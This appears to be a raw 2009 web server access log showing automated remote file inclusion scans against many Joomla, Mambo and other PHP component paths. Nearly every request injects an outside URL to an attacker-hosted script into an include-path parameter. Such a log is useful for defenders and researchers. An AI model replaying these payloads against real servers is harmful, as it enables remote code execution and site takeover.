63.247.65.114 - - [06/Jan/2009:08:33:10 -0800] "GET /services.php?page=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:08:33:10 -0800] "GET /logs/services.php?page=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:33:15 -0800] "GET /logs/index.php?option=com_maxcomment&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:33:16 -0800] "GET /index.php?option=com_maxcomment&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 95176 "-" "libwww-perl/5.810" "www.dmulk.com"
203.191.149.3 - - [06/Jan/2009:08:33:23 -0800] "GET /logs/access_080412.log//modules/xfsection/modify.php?dir_module=http://www.ptps.cyc.edu.tw/count_data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.191.149.3 - - [06/Jan/2009:08:33:23 -0800] "GET /logs/access_080412.log//modules/xfsection/modify.php?dir_module=http://www.ptps.cyc.edu.tw/count_data.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.191.149.3 - - [06/Jan/2009:08:33:23 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.ptps.cyc.edu.tw/count_data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.191.149.3 - - [06/Jan/2009:08:33:23 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.ptps.cyc.edu.tw/count_data.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.191.149.3 - - [06/Jan/2009:08:33:24 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.ptps.cyc.edu.tw/count_data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.37.54 - - [06/Jan/2009:08:33:25 -0800] "GET /logs/access_080924.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://h1.ripway.com/h4r4zuku/responz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:29 -0800] "GET /logs/access_080509.log%20%20//?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:29 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:30 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:31 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:31 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:32 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:32 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_color/admin.color.php?mosConfig_live_site=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:08:33:32 -0800] "GET /logs/access_080226.log/services.php?page=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:33 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:33 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:34 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:34 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:35 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:35 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:36 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:36 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:37 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:37 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:38 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:38 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:39 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:39 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:40 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:40 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:41 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:41 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:42 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:42 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:43 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:08:33:43 -0800] "GET /includes/messages.inc.php?include_path=http://oursoultvxq.com/bbs/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:43 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:08:33:43 -0800] "GET /logs//includes/messages.inc.php?include_path=http://oursoultvxq.com/bbs/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:44 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:44 -0800] "GET /logs/access_080509.log%20%20//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:45 -0800] "GET /logs/access_080509.log%20%20//akocomments.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:45 -0800] "GET /logs/access_080509.log%20%20//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:46 -0800] "GET /logs/access_080509.log%20%20//component/com_events/includes/comutils.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:46 -0800] "GET /logs/access_080509.log%20%20//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:47 -0800] "GET /logs/access_080509.log%20%20//components/calendar/com_calendar.php?absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:47 -0800] "GET /logs/access_080509.log%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:47 -0800] "GET /logs/access_080509.log%20%20//components/com_calendar.php?absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:48 -0800] "GET /logs/access_080509.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:48 -0800] "GET /logs/access_080509.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:49 -0800] "GET /logs/access_080509.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:49 -0800] "GET /logs/access_080509.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:50 -0800] "GET /logs/access_080509.log%20%20//components/com_forum/download.php?phpbb_root_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:50 -0800] "GET /logs/access_080509.log%20%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.252.2 - - [06/Jan/2009:08:33:50 -0800] "GET /logs//contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.252.2 - - [06/Jan/2009:08:33:50 -0800] "GET /logs/access_080530.log%20%20//contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.252.2 - - [06/Jan/2009:08:33:50 -0800] "GET /contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:51 -0800] "GET /logs/access_080509.log%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:51 -0800] "GET /logs/access_080509.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:52 -0800] "GET /logs/access_080509.log%20%20//components/com_jcs/jcs.function.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:52 -0800] "GET /logs/access_080509.log%20%20//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:53 -0800] "GET /logs/access_080509.log%20%20//components/com_jombib/BibTex.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:53 -0800] "GET /logs/access_080509.log%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:54 -0800] "GET /logs/access_080509.log%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:54 -0800] "GET /logs/access_080509.log%20%20//components/com_mambowiki/MamboLogin.php?IP=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:55 -0800] "GET /logs/access_080509.log%20%20//components/com_minibb.php?absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:55 -0800] "GET /logs/access_080509.log%20%20//components/com_moodle/moodle.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:56 -0800] "GET /logs/access_080509.log%20%20//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:56 -0800] "GET /logs/access_080509.log%20%20//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:57 -0800] "GET /logs/access_080509.log%20%20//components/com_mospray/scripts/admin.php?basedir=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:57 -0800] "GET /logs/access_080509.log%20%20//components/com_mp3_allopass/allopass.php?mosConfig_live_site=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:57 -0800] "GET /logs/access_080509.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:58 -0800] "GET /logs/access_080509.log%20%20//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:58 -0800] "GET /logs/access_080509.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:59 -0800] "GET /logs/access_080509.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:33:59 -0800] "GET /logs/access_080509.log%20%20//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:00 -0800] "GET /logs/access_080509.log%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:00 -0800] "GET /logs/access_080509.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:01 -0800] "GET /logs/access_080509.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:01 -0800] "GET /logs/access_080509.log%20%20//components/com_simpleboard/image_upload.php?sbp=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:02 -0800] "GET /logs/access_080509.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:02 -0800] "GET /logs/access_080509.log%20%20//components/com_smf/smf.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:03 -0800] "GET /logs/access_080509.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:03 -0800] "GET /logs/access_080509.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:04 -0800] "GET /logs/access_080509.log%20%20//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:04 -0800] "GET /logs/access_080509.log%20%20//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:05 -0800] "GET /logs/access_080509.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:08:34:05 -0800] "GET /logs/access_080626.log/services.php?page=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:08:34:05 -0800] "GET /services.php?page=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:05 -0800] "GET /logs/access_080509.log%20%20//components/minibb/index.php?absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:05 -0800] "GET /logs/access_080509.log%20%20//database.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:06 -0800] "GET /logs/access_080509.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:08:34:06 -0800] "GET /logs/services.php?page=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:06 -0800] "GET /logs/access_080509.log%20%20//includes/adminAvatars.php?GlobalSettings[templatesDirectory]=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:07 -0800] "GET /logs/access_080509.log%20%20//includes/adminSmileys.php?GlobalSettings[templatesDirectory]=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:07 -0800] "GET /logs/access_080509.log%20%20//includes/functions_cms.php?phpbb_root_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:08 -0800] "GET /logs/access_080509.log%20%20//includes/move.php?GlobalSettings[templatesDirectory]=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:08 -0800] "GET /logs/access_080509.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:09 -0800] "GET /logs/access_080509.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
